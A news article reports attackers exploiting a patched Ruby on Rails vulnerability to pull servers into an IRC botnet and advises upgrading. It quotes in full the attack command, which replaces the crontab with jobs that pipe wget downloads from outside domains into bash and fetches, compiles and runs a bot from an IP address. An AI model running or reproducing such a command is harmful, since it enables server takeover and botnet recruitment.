Attackers are exploiting an extremely critical vulnerability in the Ruby on Rails framework to commandeer servers and make them part of a malicious network of hacked machines, a security researcher said.

Ars first warned of the threat in early January, shortly after Rails maintainers issued a patch for the vulnerability. Ars warned at the time that the vulnerability gave attackers the ability to remotely execute malicious code on underlying servers. Criminals' success in exploiting the bug to make vulnerable machines join a botnet suggests that many server administrators still haven't installed the critical update more than four months after it was issued.

Servers that have been exploited are infected with software that caused them to join an Internet Relay Chat (IRC) channel on one of at least two servers, security researcher Jeff Jarmoc said in a post published Tuesday to his personal website. Attackers can force servers to download and execute malicious code and join new IRC channels from there. The channels required no authentication to be accessed, making it possible for competing attackers to infiltrate the chat room and take control of the compromised servers. IRC-based botnets harken back to the earlier days of computer crime because they made it easy for "script kiddies," or relatively unskilled hackers, to control huge numbers of infected machines in lock step, using a handful of pre-programmed commands.

"In short, this is a pretty straightforward skiddy exploit of a vulnerability that has been publicly known, and warned about, for months," Jarmoc, wrote in the post. "That isn't to say it won't make a bad day for some people, though." Jarmoc works for Dell SecureWorks Matasano, but he said he was speaking on his own behalf and not that of his employer.

Jarmoc's post didn't say how many servers were infected by the bot, and in a tweet he said the servers the hacked machines reported to are now offline. The attack appears to have been hit various servers across the Internet, as evidenced by posts here, here, and here.

According to Jarmoc, the attack is triggered by a remotely issued command that looks like this:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Jarmoc continued:

This adds a command to crontab which downloads and executes files called cmd1, cmd2, and cmd3. At the time of this writing, these are no longer available. These domains have been previously associated with supsicious activity Next, it downloads a C source file called k.c to /tmp, compiles it using the system’s gcc, and executes it. Finally, it downloads and executes a pre-compiled version of k, presumably in case compilation fails. The source of k.c is available. This file executes with a name of ‘– bash’ which will appear in the processlist. It sets up an IRC bot, which connects to either cvv4you.ru (currently 188.190.124.81) or the bare IP 188.190.124.120 and joins the channel #rails. While the code supports it, no channel key is used. The script uses a randomly generated 9 character nickname when connecting to IRC. A lockfile ‘/tmp/tan.pid’ ensures the bot only executes once on an infected host.

Readers who operate servers running Ruby on Rails should make sure they're running versions 3.2.11, 3.1.10, 3.0.19, or 2.3.15 or later since they are immune to the attacks. Those who can't update immediately should follow workarounds including disabling XML or disabling YAML and Symbol type conversion from the Rails XML parser. Code that streamlines these workarounds is available here.

The Ruby attacks are the latest sign of the growing vulnerability of servers used to run websites and perform other large-scale tasks. Over the past few months, a rash of attacks have taken remote control of Apache, the most widely used Web server. Three weeks ago, they expanded to commandeer nginx and Lighttpd as well.

Researchers still don't know how attackers are able to compromise those Web servers. But the cause of the newly discovered attacks on Ruby on Rails servers is clear, and the exploits are easy to block—but only if admins spend a few minutes to lock down their systems.